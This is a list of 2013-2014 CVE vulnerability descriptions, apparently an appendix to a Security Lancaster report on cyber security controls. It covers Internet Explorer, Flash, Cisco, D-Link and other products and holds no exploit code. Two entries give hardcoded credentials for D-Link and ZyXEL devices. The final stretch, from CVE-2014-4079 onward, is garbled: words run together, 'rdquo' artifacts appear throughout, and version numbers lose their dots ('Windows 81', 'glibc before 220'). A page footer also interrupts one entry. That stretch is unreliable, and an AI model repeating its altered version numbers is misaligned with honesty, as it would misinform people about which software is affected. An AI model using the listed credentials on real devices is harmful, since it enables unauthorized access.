CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to /filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
